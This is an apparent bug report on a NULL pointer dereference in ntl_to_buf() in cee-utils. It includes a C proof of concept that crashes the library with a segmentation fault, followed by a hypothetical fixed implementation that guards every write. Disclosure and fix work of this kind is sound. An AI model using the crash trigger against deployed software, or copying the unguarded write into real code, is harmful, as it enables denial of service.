The NULL Pointer vulnerability happens in ntl_to_buf(), cee-utils/ntl.c
How the vulnerability happens:
ntl_to_buf() is invoked with buf == NULL while the first element of p is NULL.
- The NULL variable buf then gets dereferenced at *buf = '\0';
Steps to reproduce:
- Save the following file as poc.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "ntl.h"

/* element serializer callback: buf may be NULL on the sizing pass */
size_t serialize_element(char *buf, size_t size, void *element) {
    if (!element) {
        const char *null_str = "null";
        if (buf) snprintf(buf, size, "%s", null_str);
        return strlen(null_str);
    }
    int *val = (int *)element;
    return snprintf(buf, size, "%d", *val);
}

int main(void) {
    ntl_t p = ntl_calloc(3, sizeof(int));
    struct ntl_str_delimiter delim = {
        .start_delimiter = '[',
        .element_delimiter = ", ",
        .last_element_delimiter = "",
        .end_delimiter = ']',
        .null_ntl = "[]"
    };
    char *result = NULL;
    /* crashes inside ntl_to_buf(): buf is NULL and gets dereferenced */
    ntl_to_abuf(&result, p, &delim, serialize_element);
    free(result);
    return 0;
}
- Compile and run
$ gcc poc.c -o poc -L. -lreddit
$ ./poc
zsh: segmentation fault (core dumped) ./poc
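For comparison, the following is an added example written for this report; it is not cee-utils code and uses hypothetical names (list_t, list_to_buf, list_to_abuf, put_str, kDelim). It shows the measure-then-fill pattern the PoC relies on (a NULL buf means "only count bytes") implemented so that every write, including the empty-list path, is guarded, so the sizing pass never touches memory through buf:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for a NULL-terminated list of element pointers
 * (the ntl_t idea): the list ends at the first NULL entry, p[n]. */
typedef void **list_t;
typedef size_t (*elem_serializer)(char *buf, size_t size, void *elem);

struct list_delim {
    char start_delimiter;
    const char *element_delimiter;
    const char *last_element_delimiter;
    char end_delimiter;
    const char *null_list;      /* text used for an empty or NULL list */
};

static const struct list_delim kDelim = { '[', ", ", "", ']', "[]" };

/* Where the next write goes, or NULL when there is no buffer or no room. */
static char *cursor(char *buf, size_t size, size_t pos) {
    return (buf && pos < size) ? buf + pos : NULL;
}
static size_t room(size_t size, size_t pos) {
    return pos < size ? size - pos : 0;
}

/* Copy s into buf (truncating, always NUL-terminated) only when a buffer
 * is present; always return the full length s needs. NULL buf = measure. */
static size_t put_str(char *buf, size_t size, const char *s) {
    size_t n = strlen(s);
    if (buf && size) {
        size_t w = n < size - 1 ? n : size - 1;
        memcpy(buf, s, w);
        buf[w] = '\0';
    }
    return n;
}

static size_t put_char(char *buf, size_t size, char c) {
    char tmp[2] = { c, '\0' };
    return put_str(buf, size, tmp);
}

/* Serialize p into buf. Every write goes through put_str, so the sizing
 * call list_to_buf(NULL, 0, ...) never dereferences buf, including on the
 * empty-list path. Returns the rendered length without the terminator. */
size_t list_to_buf(char *buf, size_t size, list_t p,
                   const struct list_delim *d, elem_serializer ser) {
    size_t pos = 0;
    if (!p || !p[0])                         /* empty list: guarded write */
        return put_str(buf, size, d->null_list);
    pos += put_char(cursor(buf, size, pos), room(size, pos), d->start_delimiter);
    for (size_t i = 0; p[i]; i++) {
        pos += ser(cursor(buf, size, pos), room(size, pos), p[i]);
        const char *sep = p[i + 1] ? d->element_delimiter
                                   : d->last_element_delimiter;
        pos += put_str(cursor(buf, size, pos), room(size, pos), sep);
    }
    pos += put_char(cursor(buf, size, pos), room(size, pos), d->end_delimiter);
    return pos;
}

/* Two-pass allocate-and-fill: measure with a NULL buffer, then write. */
char *list_to_abuf(list_t p, const struct list_delim *d, elem_serializer ser) {
    size_t need = list_to_buf(NULL, 0, p, d, ser);
    char *out = malloc(need + 1);
    if (!out) return NULL;
    list_to_buf(out, need + 1, p, d, ser);
    return out;
}

/* Element callback: int values; a NULL element renders as "null". */
size_t int_serializer(char *buf, size_t size, void *elem) {
    if (!elem) return put_str(buf, size, "null");
    return (size_t)snprintf(buf, size, "%d", *(int *)elem);   /* NULL/0 ok */
}

/* Build a list over vals[0..n) (constructed input) and render it. */
char *render_ints(int *vals, size_t n) {
    void **p = calloc(n + 1, sizeof *p);     /* p[n] stays NULL: terminator */
    if (!p) return NULL;
    for (size_t i = 0; i < n; i++) p[i] = &vals[i];
    char *s = list_to_abuf(p, &kDelim, int_serializer);
    free(p);
    return s;
}

/* Returns 1 when both the populated and the empty list render correctly. */
int self_check(void) {
    int vals[] = { 1, 2, 3 };
    char *s = render_ints(vals, 3);
    char *e = render_ints(NULL, 0);          /* exercises the null_list path */
    int ok = s && e && strcmp(s, "[1, 2, 3]") == 0 && strcmp(e, "[]") == 0;
    free(s);
    free(e);
    return ok;
}

int main(void) {
    printf("self_check: %d, empty list needs %zu bytes\n", self_check(),
           list_to_buf(NULL, 0, NULL, &kDelim, int_serializer));
    return 0;
}
```

The detail that matters for the report above is the empty-list branch: the sizing pass reaches it with buf == NULL, so the early return must go through a write routine that checks for a buffer instead of storing a terminator unconditionally.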